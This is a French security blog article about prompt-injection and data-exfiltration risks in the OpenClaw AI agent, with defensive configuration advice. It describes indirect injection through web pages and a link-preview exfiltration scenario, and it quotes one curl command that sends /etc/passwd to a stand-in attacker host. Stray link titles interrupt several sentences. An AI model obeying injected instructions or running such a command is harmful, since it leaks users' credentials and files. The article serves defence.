OpenClaw : comment les failles d’injection de prompt menacent vos données

Orphée Grandsable

Une menace qui plane déjà sur plus de 30 % des déploiements d’agents IA en 2025 - et vous pourriez en faire partie.

Dans un contexte où les agents autonomes gagnent en popularité, OpenClaw suscite à la fois fascination et inquiétude. Le CNCERT (China’s National Computer Network Emergency Response Technical Team) vient d’alerter la communauté sur des configurations par défaut intrinsèquement faibles qui ouvrent la porte à des attaques d’injection de prompt et d’exfiltration de données. Cet article décortique les vulnérabilités, illustre leurs impacts concrets, et vous propose un plan d’actions détaillé pour sécuriser votre installation.

Comprendre les vulnérabilités d’OpenClaw

Configurations par défaut faibles

OpenClaw, distribué en open-source, se lance généralement avec un port de gestion exposé (par défaut le 8080) et des identifiants admin pré-configurés (« admin/admin »). Selon le rapport de l’ANSSI 2025, 42 % des incidents liés aux IA proviennent de configurations par défaut non renforcées. Cette exposition permet à un attaquant de se connecter à distance, d’injecter des skills malveillants ou de manipuler le modèle. Vulnérabilité Mediatek sur Android

Accès privilégié au système

L’agent possède des droits élevés pour exécuter des tâches autonomes : récupération de fichiers, lancement de scripts, voire modification de la configuration du système. Cette capacité, si elle n’est pas strictement confinée, devient une porte dérobée. En pratique, nous avons observé que des scripts malveillants installés via le dépôt public ClawHub ont pu déployer des ransomwares en moins de deux minutes.

Mécanismes d’injection de prompt et exfiltration de données

Injection indirecte (IDPI/XPIA)

L’injection de prompt ne se limite plus à placer du texte malveillant dans un champ de saisie. Les chercheurs de PromptArmor ont démontré que OpenClaw peut être manipulé via des pages web contenant des instructions déguisées, appelées indirect prompt injection (IDPI) ou cross-domain prompt injection (XPIA). En résumé, l’agent analyse le contenu d’une page, exécute les commandes cachées et renvoie les résultats.

« Les agents capables de naviguer sur le web offrent de nouvelles surfaces d’attaque, et chaque point d’interaction devient un vecteur possible », explique le blog d’OpenAI (mars 2026).

Scénario de lien prévisualisé

Un exemple frappant : un attaquant partage un lien dans Telegram. OpenClaw, configuré pour générer automatiquement un aperçu du lien, produit une URL contenant les données sensibles de l’utilisateur (ex. : token d’authentification). Dès que l’application crée le preview, la requête part vers le serveur de l’attaquant, exfiltrant les informations sans interaction de l’utilisateur.

# Exemple de règle iptables bloquant le port de gestion exposé
iptables -A INPUT -p tcp --dport 8080 -s 0.0.0.0/0 -j DROP

Impacts concrets pour les organisations françaises

Secteurs à haut risque

  • Finance : fuite de données de marché, compromission de modèles de prévision.
  • Énergie : divulgation de schémas de réseaux et de procédures de sécurité.
  • Santé : exposition de dossiers patients, violation du RGPD.

Exemple de compromission réelle

En avril 2026, une société de services informatiques a vu son dépôt GitHub infiltré par un skill malveillant nommé « claw-stealer » Zombie Zip – archive malveillante. Le skill, installé via ClawHub, a exécuté la commande suivante :

curl -s https://malicious.example.com/collect?data=$(cat /etc/passwd) > /dev/null

L’opération a permis de récupérer le fichier /etc/passwd et les clés SSH du serveur, entraînant une paralysie des services pendant 48 heures. Le coût estimé de la remise en état a dépassé 250 000 €, selon l’enquête menée par le cabinet d’audit CyberSec.

« Une intrusion via un agent IA mal configuré peut rapidement se transformer en incident critique, surtout dans les infrastructures critiques », signale le CNCERT.

Mesures de mitigation recommandées

  • Restreindre l’accès réseau : isolez le service OpenClaw derrière un firewall ou un réseau privé virtuel.
  • Changer les identifiants par défaut : utilisez des mots de passe complexes et stockez-les dans un gestionnaire de secrets.
  • Désactiver les mises à jour automatiques de skills : ne téléchargez que depuis des sources vérifiées (ex. : dépôt officiel signé). Guide complet freelance cybersécurité 2026
  • Activer le chiffrement des communications : configurez TLS sur le port de gestion.
  • Limiter les privilèges système : exécutez l’agent en tant qu’utilisateur non-root et utilisez des conteneurs sandbox.
  • Surveiller les logs d’activité : alertez sur toute requête de génération d’URL inhabituelle.
  • Auditer régulièrement les compétences installées : supprimez les modules obsolètes ou inconnus.

Tableau comparatif - Configuration par défaut vs Configuration sécurisée

AspectPar défaut (risqué)Sécurisé (recommandé)
Port de gestion8080 ouvert à InternetBloqué par firewall, accès uniquement interne
Identifiants adminadmin / adminMots de passe forts, stockés dans Vault
Mise à jour des skillsAutomatique depuis ClawHubManuelle, signatures vérifiées
Niveau d’isolationProcessus direct sur l’hôteConteneur Docker avec limites de ressources
Chiffrement des échangesHTTP clairHTTPS avec certificats valides

Guide de mise en œuvre : sécuriser OpenClaw pas à pas

  1. Déployer dans un conteneur : créez un fichier docker-compose.yml avec les paramètres de réseau isolé.
  2. Modifier le fichier de configuration (config.yaml) : changez admin_user et admin_password, activez tls: true.
  3. Restreindre le port : ajoutez une règle iptables ou configurez le groupe de sécurité cloud.
  4. Installer uniquement les skills signés : utilisez la commande clawctl skill install --verify <signature>.
  5. Activer la journalisation : configurez log_level: warn et redirigez les logs vers un SIEM.
  6. Tester les vecteurs d’injection : lancez des scénarios de simulation avec des prompts malveillants pour valider les filtres.
  7. Mettre en place une veille : abonnez-vous aux alertes du CNCERT et aux bulletins de sécurité de l’ANSSI.
version: '3.8'
services:
  openclaw:
    image: openclaw/agent:latest
    restart: unless-stopped
    ports:
      - "127.0.0.1:8080:8080"
    environment:
      - ADMIN_USER=secureadmin
      - ADMIN_PASSWORD=${ADMIN_PASS}
      - TLS_ENABLED=true
    volumes:
      - ./data:/app/data
    networks:
      - isolated_net
networks:
  isolated_net:
    driver: bridge

Conclusion - Agissez dès aujourd’hui pour protéger vos actifs

Les vulnérabilités d’OpenClaw illustrent les nouveaux défis posés par les agents IA autonomes : des configurations laxistes peuvent être exploitées pour des injections de prompt sophistiquées, menant à des fuites de données instantanées. En appliquant les mesures de mitigation détaillées, en isolant l’environnement d’exécution et en adoptant une démarche de security-by-design, vous réduisez drastiquement le risque d’une compromission.

Nous vous encourageons à auditer dès maintenant votre déploiement OpenClaw, à appliquer le tableau de configuration sécurisée, et à instaurer une veille continue via le CNCERT et l’ANSSI. La sécurité de vos systèmes ne doit pas être laissée au hasard - elle doit être proactive, structurée et adaptée aux spécificités de l’IA.